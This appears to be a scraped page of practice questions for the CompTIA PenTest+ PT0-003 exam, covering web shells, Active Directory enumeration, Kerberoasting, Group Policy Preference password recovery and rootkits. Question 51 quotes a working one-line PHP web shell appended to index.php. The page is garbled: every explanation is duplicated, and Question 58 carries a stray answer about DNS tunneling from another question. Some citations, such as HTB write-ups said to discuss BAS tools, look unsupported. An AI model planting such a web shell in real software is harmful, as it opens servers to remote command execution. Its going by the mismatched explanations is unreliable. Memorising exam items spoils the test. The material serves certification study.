Practice Free PT0-003 Exam Online Questions
Question #51
A penetration tester obtains a reverse shell on a server and executes the following command on the compromised server:
echo ‘<?php system($_GET["c"]); ?>’ >> /var/www/public/index.php
Which of the following best explains what the penetration tester is trying to do?
- A . Prevent detection.
- B . Circumvent controls.
- C . Move laterally.
- D . Establish persistence.
Correct Answer: D
D
Explanation:
The command appends PHP code to a web-accessible file, effectively creating a simple web shell. By adding system($_GET["c"]); into index.php, the tester can later execute operating system commands remotely through the web server by passing a parameter in the URL. This is most closely associated with establishing persistence, because it gives the tester a reusable method to regain command execution even if the original reverse shell session is lost. It is not primarily lateral movement, since the action is being performed on the already compromised host rather than expanding to another system. It is also not mainly about avoiding detection or bypassing a specific security control. The key objective is maintaining durable access through an alternate remote execution channel.
D
Explanation:
The command appends PHP code to a web-accessible file, effectively creating a simple web shell. By adding system($_GET["c"]); into index.php, the tester can later execute operating system commands remotely through the web server by passing a parameter in the URL. This is most closely associated with establishing persistence, because it gives the tester a reusable method to regain command execution even if the original reverse shell session is lost. It is not primarily lateral movement, since the action is being performed on the already compromised host rather than expanding to another system. It is also not mainly about avoiding detection or bypassing a specific security control. The key objective is maintaining durable access through an alternate remote execution channel.
Question #52
A penetration tester assesses an application allow list and has limited command-line access on the
Windows system.
Which of the following would give the penetration tester information that could aid in continuing the test?
- A . mmc.exe
- B . icacls.exe
- C . nltest.exe
- D . rundll.exe
Correct Answer: C
C
Explanation:
When a penetration tester has limited command-line access on a Windows system, the choice of tool is critical for gathering information to aid in furthering the test.
Here’s an explanation for each option:
mmc.exe (Microsoft Management Console):
Primarily used for managing Windows and its services. It’s not typically useful for gathering information about the system from the command line in a limited access scenario.
icacls.exe:
This tool is used for modifying file and folder permissions. While useful for modifying security settings, it does not directly aid in gathering system information or enumeration.
nltest.exe:
This is a powerful command-line utility for network testing and gathering information about domain controllers, trusts, and replication status.
Key functionalities include:
Listing domain controllers: nltest /dclist:<DomainName>
Querying domain trusts: nltest /domain_trusts
Checking secure channel: nltest /sc_query:<DomainName>
These capabilities make nltest very useful for understanding the network environment, especially in a domain context, which is essential for penetration testing.
rundll.exe:
This utility is used to run DLLs as programs. While it can be used for executing code, it does not
provide direct information about the system or network environment.
Conclusion: nltest.exe is the best choice among the given options as it provides valuable information about the network, domain controllers, and trust relationships. This information is crucial for a penetration tester to plan further actions and understand the domain environment.
C
Explanation:
When a penetration tester has limited command-line access on a Windows system, the choice of tool is critical for gathering information to aid in furthering the test.
Here’s an explanation for each option:
mmc.exe (Microsoft Management Console):
Primarily used for managing Windows and its services. It’s not typically useful for gathering information about the system from the command line in a limited access scenario.
icacls.exe:
This tool is used for modifying file and folder permissions. While useful for modifying security settings, it does not directly aid in gathering system information or enumeration.
nltest.exe:
This is a powerful command-line utility for network testing and gathering information about domain controllers, trusts, and replication status.
Key functionalities include:
Listing domain controllers: nltest /dclist:<DomainName>
Querying domain trusts: nltest /domain_trusts
Checking secure channel: nltest /sc_query:<DomainName>
These capabilities make nltest very useful for understanding the network environment, especially in a domain context, which is essential for penetration testing.
rundll.exe:
This utility is used to run DLLs as programs. While it can be used for executing code, it does not
provide direct information about the system or network environment.
Conclusion: nltest.exe is the best choice among the given options as it provides valuable information about the network, domain controllers, and trust relationships. This information is crucial for a penetration tester to plan further actions and understand the domain environment.
Question #53
During an assessment, a penetration tester runs the following command:
setspn.exe -Q /
Which of the following attacks is the penetration tester preparing for?
- A . LDAP injection
- B . Pass-the-hash
- C . Kerberoasting
- D . Dictionary
Correct Answer: C
C
Explanation:
Kerberoasting is an attack that involves requesting service tickets for service accounts from a Kerberos service, extracting the service tickets, and attempting to crack them offline to retrieve the
plaintext passwords.
Understanding Kerberoasting:
Purpose: To obtain service account passwords by cracking the encrypted service tickets (TGS tickets) offline.
Service Principal Names (SPNs): SPNs are used in Kerberos authentication to uniquely identify a service instance.
Command Breakdown:
setspn.exe -Q /: This command queries all SPNs in the domain.
Use Case: Identifying accounts with SPNs that can be targeted for Kerberoasting.
Kerberoasting Steps:
Identify SPNs: Use setspn.exe to list service accounts with SPNs.
Request TGS Tickets: Request TGS tickets for the identified SPNs.
Extract Tickets: Use tools like Mimikatz to extract the service tickets.
Crack Tickets: Use password cracking tools like Hashcat to crack the extracted tickets offline.
Reference from Pentesting Literature:
Kerberoasting is a well-documented attack method in penetration testing guides, specifically targeting service accounts in Active Directory environments.
HTB write-ups often detail the use of Kerberoasting for gaining credentials from service accounts.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
C
Explanation:
Kerberoasting is an attack that involves requesting service tickets for service accounts from a Kerberos service, extracting the service tickets, and attempting to crack them offline to retrieve the
plaintext passwords.
Understanding Kerberoasting:
Purpose: To obtain service account passwords by cracking the encrypted service tickets (TGS tickets) offline.
Service Principal Names (SPNs): SPNs are used in Kerberos authentication to uniquely identify a service instance.
Command Breakdown:
setspn.exe -Q /: This command queries all SPNs in the domain.
Use Case: Identifying accounts with SPNs that can be targeted for Kerberoasting.
Kerberoasting Steps:
Identify SPNs: Use setspn.exe to list service accounts with SPNs.
Request TGS Tickets: Request TGS tickets for the identified SPNs.
Extract Tickets: Use tools like Mimikatz to extract the service tickets.
Crack Tickets: Use password cracking tools like Hashcat to crack the extracted tickets offline.
Reference from Pentesting Literature:
Kerberoasting is a well-documented attack method in penetration testing guides, specifically targeting service accounts in Active Directory environments.
HTB write-ups often detail the use of Kerberoasting for gaining credentials from service accounts.
Step-by-Step ExplanationReference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
Question #54
A penetration tester successfully phishes a user and compromises a domain-joined endpoint. The tester enumerates the domain controller and discovers that Group Policy Preferences are in use. The tester also finds that the version of the domain controllers is Windows Server 2012. The tester wants to use the fastest possible method of pivoting successfully to multiple production servers joined to the domain.
Which of the following is the best way to achieve this goal?
- A . Scan the domain controller and locate an RCE using a Metasploit module with a reverse shell.
- B . Run Hydra to password spray any dumped credentials from the initial host across subnets.
- C . Use BloodHound to look for escalation paths against the AD environment.
- D . Find the SYSVOL share for hashes with findstr /i and decrypt using the published key.
Correct Answer: D
D
Explanation:
The correct answer is D. Find the SYSVOL share for hashes with findstr /i and decrypt using the published key.
Group Policy Preferences previously allowed administrators to store local user passwords in Group Policy XML files inside the domain’s SYSVOL share. These passwords were stored as cpassword values. Although encrypted, Microsoft published the AES key used to decrypt them, which means anyone with domain access could potentially retrieve and decrypt those credentials.
Because SYSVOL is commonly readable by authenticated domain users, a compromised domain-joined endpoint can be used to search SYSVOL for Group Policy Preference XML files containing cpassword values. Once decrypted, these credentials may provide local administrator access across multiple domain-joined systems, making this a fast method for pivoting to production servers.
A is incorrect because scanning the domain controller for remote code execution is noisy, risky, and not the fastest or best approach when Group Policy Preferences already expose a known credential-recovery path.
B is incorrect because password spraying with Hydra is slower, noisier, and may trigger account lockouts or detection. The scenario points specifically to Group Policy Preferences, which suggests credential recovery from SYSVOL.
C is incorrect because BloodHound is useful for identifying Active Directory attack paths, but it is not the fastest option when exploitable Group Policy Preference credentials are already known to be present.
In PenTest+ terms, this falls under Attacks and Exploits, specifically Active Directory post-exploitation, credential discovery, Group Policy Preferences abuse, and lateral movement.
D
Explanation:
The correct answer is D. Find the SYSVOL share for hashes with findstr /i and decrypt using the published key.
Group Policy Preferences previously allowed administrators to store local user passwords in Group Policy XML files inside the domain’s SYSVOL share. These passwords were stored as cpassword values. Although encrypted, Microsoft published the AES key used to decrypt them, which means anyone with domain access could potentially retrieve and decrypt those credentials.
Because SYSVOL is commonly readable by authenticated domain users, a compromised domain-joined endpoint can be used to search SYSVOL for Group Policy Preference XML files containing cpassword values. Once decrypted, these credentials may provide local administrator access across multiple domain-joined systems, making this a fast method for pivoting to production servers.
A is incorrect because scanning the domain controller for remote code execution is noisy, risky, and not the fastest or best approach when Group Policy Preferences already expose a known credential-recovery path.
B is incorrect because password spraying with Hydra is slower, noisier, and may trigger account lockouts or detection. The scenario points specifically to Group Policy Preferences, which suggests credential recovery from SYSVOL.
C is incorrect because BloodHound is useful for identifying Active Directory attack paths, but it is not the fastest option when exploitable Group Policy Preference credentials are already known to be present.
In PenTest+ terms, this falls under Attacks and Exploits, specifically Active Directory post-exploitation, credential discovery, Group Policy Preferences abuse, and lateral movement.
Question #55
A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers.
Which of the following actions would the tester most likely take?
- A . Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.
- B . Perform an internal vulnerability assessment with credentials to review the internal attack surface.
- C . Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.
- D . Perform a full internal penetration test to review all the possible exploits that could affect the systems.
Correct Answer: A
A
Explanation:
BAS (Breach and Attack Simulation) tools are specifically designed to emulate multiple TTPs (Tactics, Techniques, and Procedures) used by adversaries. These tools can simulate various attack vectors in a controlled manner to test the effectiveness of an organization’s security defenses and response mechanisms.
Here ’ s why option A is the best choice:
Controlled Testing Environment: BAS tools provide a controlled environment where multiple TTPs can be tested without causing unintended damage to the internal systems and servers. This is critical when the threat-modeling team indicates potential impacts on internal systems.
Comprehensive Coverage: BAS tools are designed to cover a wide range of TTPs, allowing the penetration tester to simulate various attack scenarios. This helps in assessing the reactions (alerted, blocked, and others) by the client’s security tools comprehensively.
Feedback and Reporting: These tools provide detailed feedback and reporting on the effectiveness of the security measures in place, including which TTPs were detected, blocked, or went unnoticed. This information is invaluable for the threat-modeling team to understand the current security posture and areas for improvement.
Reference from Pentest:
Anubis HTB: This write-up highlights the importance of using controlled tools and methods for testing security mechanisms. BAS tools align with this approach by providing a controlled and systematic way to assess security defenses.
Forge HTB: Emphasizes the use of various testing tools and techniques to simulate real-world attacks and measure the effectiveness of security controls. BAS tools are mentioned as a method to ensure comprehensive coverage and minimal risk to internal systems.
Conclusion:
Using a BAS tool to test multiple TTPs allows for a thorough and controlled assessment of the client’s security tools’ effectiveness. This approach ensures that the testing is systematic, comprehensive, and minimally disruptive, making it the best choice.
A
Explanation:
BAS (Breach and Attack Simulation) tools are specifically designed to emulate multiple TTPs (Tactics, Techniques, and Procedures) used by adversaries. These tools can simulate various attack vectors in a controlled manner to test the effectiveness of an organization’s security defenses and response mechanisms.
Here ’ s why option A is the best choice:
Controlled Testing Environment: BAS tools provide a controlled environment where multiple TTPs can be tested without causing unintended damage to the internal systems and servers. This is critical when the threat-modeling team indicates potential impacts on internal systems.
Comprehensive Coverage: BAS tools are designed to cover a wide range of TTPs, allowing the penetration tester to simulate various attack scenarios. This helps in assessing the reactions (alerted, blocked, and others) by the client’s security tools comprehensively.
Feedback and Reporting: These tools provide detailed feedback and reporting on the effectiveness of the security measures in place, including which TTPs were detected, blocked, or went unnoticed. This information is invaluable for the threat-modeling team to understand the current security posture and areas for improvement.
Reference from Pentest:
Anubis HTB: This write-up highlights the importance of using controlled tools and methods for testing security mechanisms. BAS tools align with this approach by providing a controlled and systematic way to assess security defenses.
Forge HTB: Emphasizes the use of various testing tools and techniques to simulate real-world attacks and measure the effectiveness of security controls. BAS tools are mentioned as a method to ensure comprehensive coverage and minimal risk to internal systems.
Conclusion:
Using a BAS tool to test multiple TTPs allows for a thorough and controlled assessment of the client’s security tools’ effectiveness. This approach ensures that the testing is systematic, comprehensive, and minimally disruptive, making it the best choice.
Question #56
A penetration tester would like to collect permission details for objects within the domain. The tester has a valid AD user and access to an internal PC.
Which of the following sets of steps is the best way for the tester to accomplish the desired outcome?
- A . Escalate privileges.Execute Rubeus.Run a Cypher query on Rubeus to get the results.
- B . Run SharpHound.Install CrackMapExec.Perform a CrackMapExec database query on CME to get the results.
- C . Run SharpHoundInstall BloodHoundPerform a Cypher query on BloodHound to get the results.
- D . Escalate privileges.Get Windows Registry data.Perform a query to get results.
Correct Answer: C
C
Explanation:
To collect permission details for objects within an Active Directory domain, the PenTest+ workflow most closely aligns with using SharpHound (the BloodHound data collector) followed by BloodHound analysis. SharpHound is executed from a domain-joined or internally reachable system using a valid AD account to enumerate domain relationships, including group membership, sessions, local admin rights, and―most importantly for this question―object control and ACL-based permissions (for example, rights that allow modifying users, resetting passwords, adding group members, or controlling GPOs). BloodHound then imports this collected graph data and allows the tester to run Cypher queries to identify effective privileges, abuse paths, and misconfigurations that enable privilege escalation or lateral movement.
Rubeus is primarily focused on Kerberos ticket operations (TGT/TGS manipulation, roasting, delegation abuse) and is not a Cypher-query permission-mapping platform. CrackMapExec supports network/AD operations, but it is not the standard toolchain for graph-based permission path analysis described in PenTest+. Registry collection is unrelated to enumerating domain object permissions.
C
Explanation:
To collect permission details for objects within an Active Directory domain, the PenTest+ workflow most closely aligns with using SharpHound (the BloodHound data collector) followed by BloodHound analysis. SharpHound is executed from a domain-joined or internally reachable system using a valid AD account to enumerate domain relationships, including group membership, sessions, local admin rights, and―most importantly for this question―object control and ACL-based permissions (for example, rights that allow modifying users, resetting passwords, adding group members, or controlling GPOs). BloodHound then imports this collected graph data and allows the tester to run Cypher queries to identify effective privileges, abuse paths, and misconfigurations that enable privilege escalation or lateral movement.
Rubeus is primarily focused on Kerberos ticket operations (TGT/TGS manipulation, roasting, delegation abuse) and is not a Cypher-query permission-mapping platform. CrackMapExec supports network/AD operations, but it is not the standard toolchain for graph-based permission path analysis described in PenTest+. Registry collection is unrelated to enumerating domain object permissions.
Question #57
A penetration tester conducts a scan on an exposed Linux web server and gathers the following data:
Host: 192.168.55.23
Open Ports:
22/tcp Open OpenSSH 7.2p2 Ubuntu 4ubuntu2.10
80/tcp Open Apache httpd 2.4.18 (Ubuntu)
111/tcp Open rpcbind 2-4 (RPC #100000)
Additional notes:
Directory listing enabled on /admin
Apache mod_cgi enabled
No authentication required to access /cgi-bin/debug.sh
X-Powered-By: PHP/5.6.40-0+deb8u12
Which of the following is the most effective action to take?
- A . Launch a payload using msfvenom and upload it to the /admin directory.
- B . Review the contents of /cgi-bin/debug.sh.
- C . Use Nikto to scan the host and port 80.
- D . Attempt a brute-force attack against OpenSSH 7.2p2.
Correct Answer: B
B
Explanation:
The most effective next action is to investigate /cgi-bin/debug.sh because it is a direct, high-signal finding: a server-side script in a CGI-enabled directory that is reachable without authentication. In PenTest+ enumeration methodology, testers prioritize items that are both accessible and likely to yield immediate impact, such as unauthenticated administrative/debug endpoints, exposed scripts, and functionality that could enable command execution or information disclosure. A debug shell script exposed through cgi-bin is a classic candidate for sensitive data leakage (paths, environment variables, credentials) or unsafe parameter handling that can lead to remote command execution― especially when mod_cgi is enabled and the file is callable over HTTP.
By comparison, uploading an msfvenom payload assumes a write primitive to /admin and an execution path, neither of which is established by the findings. Nikto can be useful, but it is redundant compared to the specific, actionable lead already identified. Brute-forcing SSH is noisy,
may violate rules of engagement, and is less efficient than testing an unauthenticated web-exposed script first.
B
Explanation:
The most effective next action is to investigate /cgi-bin/debug.sh because it is a direct, high-signal finding: a server-side script in a CGI-enabled directory that is reachable without authentication. In PenTest+ enumeration methodology, testers prioritize items that are both accessible and likely to yield immediate impact, such as unauthenticated administrative/debug endpoints, exposed scripts, and functionality that could enable command execution or information disclosure. A debug shell script exposed through cgi-bin is a classic candidate for sensitive data leakage (paths, environment variables, credentials) or unsafe parameter handling that can lead to remote command execution― especially when mod_cgi is enabled and the file is callable over HTTP.
By comparison, uploading an msfvenom payload assumes a write primitive to /admin and an execution path, neither of which is established by the findings. Nikto can be useful, but it is redundant compared to the specific, actionable lead already identified. Brute-forcing SSH is noisy,
may violate rules of engagement, and is less efficient than testing an unauthenticated web-exposed script first.
Question #58
During a routine penetration test, the client’s security team observes logging alerts that indicate several ID badges were reprinted after working hours without authorization.
Which of the following is the penetration tester most likely trying to do?
- A . Obtain long-term, valid access to the facility
- B . Disrupt the availability of facility access systems
- C . Change access to the facility for valid users
- D . Revoke access to the facility for valid users
Correct Answer: A
A
Explanation:
The unauthorized reprinting of ID badges suggests the penetration tester is attempting physical security penetration testing to gain long-term access.
Option A (Obtain long-term, valid access) ✅ : Correct. Cloning or reprinting badges allows persistent access past security checks.
Option B (Disrupt availability) ❌ : There is no indication of a denial-of-service attack.
Option C (Change access for valid users) ❌ : The goal is not modifying user access, but rather gaining unauthorized access.
Option D (Revoke access for valid users) ❌ : The logs show new badges being printed, not revocation.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Physical Security Testing
Answer A
An increase in DNS traffic during a penetration test suggests data exfiltration using DNS tunneling, a method where attackers encode data into DNS queries to avoid detection.
Option A (Covert data exfiltration) ✅ : Correct. DNS tunneling (e.g., dnscat2, Iodine) is a stealthy method to bypass firewalls and extract sensitive data.
Option B (URL spidering) ❌ : Would cause increased web traffic, not DNS requests.
Option C (HTML scraping) ❌ : Involves parsing web pages, not DNS traffic.
Option D (DoS attack) ❌ : DoS floods bandwidth or servers, but does not increase DNS queries significantly.
Reference: CompTIA PenTest+ PT0-003 Official Guide C DNS Tunneling & Data Exfiltration
A
Explanation:
The unauthorized reprinting of ID badges suggests the penetration tester is attempting physical security penetration testing to gain long-term access.
Option A (Obtain long-term, valid access) ✅ : Correct. Cloning or reprinting badges allows persistent access past security checks.
Option B (Disrupt availability) ❌ : There is no indication of a denial-of-service attack.
Option C (Change access for valid users) ❌ : The goal is not modifying user access, but rather gaining unauthorized access.
Option D (Revoke access for valid users) ❌ : The logs show new badges being printed, not revocation.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Physical Security Testing
Answer A
An increase in DNS traffic during a penetration test suggests data exfiltration using DNS tunneling, a method where attackers encode data into DNS queries to avoid detection.
Option A (Covert data exfiltration) ✅ : Correct. DNS tunneling (e.g., dnscat2, Iodine) is a stealthy method to bypass firewalls and extract sensitive data.
Option B (URL spidering) ❌ : Would cause increased web traffic, not DNS requests.
Option C (HTML scraping) ❌ : Involves parsing web pages, not DNS traffic.
Option D (DoS attack) ❌ : DoS floods bandwidth or servers, but does not increase DNS queries significantly.
Reference: CompTIA PenTest+ PT0-003 Official Guide C DNS Tunneling & Data Exfiltration
Question #59
During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software.
Which of the following host-based attacks should the tester use?
- A . On-path
- B . Logic bomb
- C . Rootkit
- D . Buffer overflow
Correct Answer: C
C
Explanation:
A rootkit is a type of malicious software designed to provide an attacker with unauthorized access to a computer system while concealing its presence. Rootkits achieve this by modifying the host’s operating system or other software to hide their existence, allowing the attacker to maintain control over the system without detection.
Definition and Purpose:
Rootkits are primarily used to gain and maintain root access (administrative privileges) on a system.
They disguise themselves as legitimate software or integrate deeply into the operating system to avoid detection.
Mechanisms of Action:
Kernel Mode Rootkits: These operate at the kernel level, which is the core of the operating system, making them very powerful and hard to detect.
User Mode Rootkits: These run in the same space as user applications, intercepting and altering standard system API calls to hide their presence.
Bootkits: These infect the Master Boot Record (MBR) or Volume Boot Record (VBR) and load before the operating system, making them extremely difficult to detect and remove.
Detection and Prevention:
Detection Tools: Tools like RootkitRevealer, Chkrootkit, and rkhunter can help in identifying rootkits.
Prevention: Regular system updates, use of strong antivirus and anti-malware solutions, and integrity checking tools like Tripwire can help in preventing rootkit infections.
Real-World Examples:
Sony BMG Rootkit: In 2005, Sony BMG included a rootkit in their digital rights management (DRM) software on music CDs. The rootkit hid files and processes, leading to a major scandal when it was discovered.
Stuxnet: This sophisticated worm included a rootkit component to hide its presence on infected systems, making it one of the most infamous examples of rootkit use in a cyber attack.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking" by Georgia Weidman, rootkits are discussed in the context of post-exploitation, where maintaining access to the compromised system is crucial.
Various HTB write-ups, such as the analysis of complex attacks involving multiple stages of exploitation, often highlight the use of rootkits in maintaining persistent access.
Step-by-Step Explanation Reference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups on sophisticated attacks
C
Explanation:
A rootkit is a type of malicious software designed to provide an attacker with unauthorized access to a computer system while concealing its presence. Rootkits achieve this by modifying the host’s operating system or other software to hide their existence, allowing the attacker to maintain control over the system without detection.
Definition and Purpose:
Rootkits are primarily used to gain and maintain root access (administrative privileges) on a system.
They disguise themselves as legitimate software or integrate deeply into the operating system to avoid detection.
Mechanisms of Action:
Kernel Mode Rootkits: These operate at the kernel level, which is the core of the operating system, making them very powerful and hard to detect.
User Mode Rootkits: These run in the same space as user applications, intercepting and altering standard system API calls to hide their presence.
Bootkits: These infect the Master Boot Record (MBR) or Volume Boot Record (VBR) and load before the operating system, making them extremely difficult to detect and remove.
Detection and Prevention:
Detection Tools: Tools like RootkitRevealer, Chkrootkit, and rkhunter can help in identifying rootkits.
Prevention: Regular system updates, use of strong antivirus and anti-malware solutions, and integrity checking tools like Tripwire can help in preventing rootkit infections.
Real-World Examples:
Sony BMG Rootkit: In 2005, Sony BMG included a rootkit in their digital rights management (DRM) software on music CDs. The rootkit hid files and processes, leading to a major scandal when it was discovered.
Stuxnet: This sophisticated worm included a rootkit component to hide its presence on infected systems, making it one of the most infamous examples of rootkit use in a cyber attack.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking" by Georgia Weidman, rootkits are discussed in the context of post-exploitation, where maintaining access to the compromised system is crucial.
Various HTB write-ups, such as the analysis of complex attacks involving multiple stages of exploitation, often highlight the use of rootkits in maintaining persistent access.
Step-by-Step Explanation Reference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups on sophisticated attacks
Question #60
Which of the following authorizations is mandatory when a penetration tester is involved in a complex IT infrastructure?
- A . Customer authorization
- B . Penetration tester authorization
- C . Third-party authorization
- D . Internal team authorization
Correct Answer: A
A
Explanation:
Before any penetration testing begins ― especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms ― a formal written authorization from the customer (client organization) is mandatory.
This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., Computer Fraud and Abuse Act in the U.S.) and corporate policies.
Why not the others:
B. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.
C. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it’s
not mandatory.
D. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.
CompTIA PT0-003 Objective Mapping:
Domain 1.0: Planning and Scoping
A
Explanation:
Before any penetration testing begins ― especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms ― a formal written authorization from the customer (client organization) is mandatory.
This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., Computer Fraud and Abuse Act in the U.S.) and corporate policies.
Why not the others:
B. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.
C. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it’s
not mandatory.
D. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.
CompTIA PT0-003 Objective Mapping:
Domain 1.0: Planning and Scoping